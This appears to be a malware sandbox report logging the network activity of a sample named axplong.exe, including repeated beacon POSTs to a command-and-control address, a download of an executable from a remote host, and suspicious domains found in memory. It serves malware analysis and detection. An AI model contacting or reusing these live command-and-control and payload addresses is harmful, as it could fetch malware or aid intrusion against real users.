Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0023BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_0023BD60

Source: global traffic

HTTP traffic detected: GET /tmp/2.exe HTTP/1.1Host: atlpvt.com

Source: global traffic	DNS traffic detected: DNS query: atlpvt.com
Source: global traffic	DNS traffic detected: DNS query: yosoborno.com
Source: global traffic	DNS traffic detected: DNS query: wshcnsd.xyz
Source: global traffic	DNS traffic detected: DNS query: nusdhj.ws

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000007.00000002.3273525737.0000000001308000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.000000000126E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 00000007.00000002.3273525737.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php?
Source: axplong.exe, 00000007.00000002.3273525737.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpTemp
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ionhrtuxphot.net/
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ionhrtuxphot.net/z/
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://nusdhj.ws/
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://nusdhj.ws:80/tmp//
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000000.2784251852.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2784734519.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2784700716.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://wshcnsd.xyz/
Source: explorer.exe, 00000009.00000003.3096160513.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2790128261.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000009.00000003.3095335436.0000000003531000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com:80/tmp/3
Source: explorer.exe, 00000009.00000003.3096295760.000000000C513000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2788512315.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
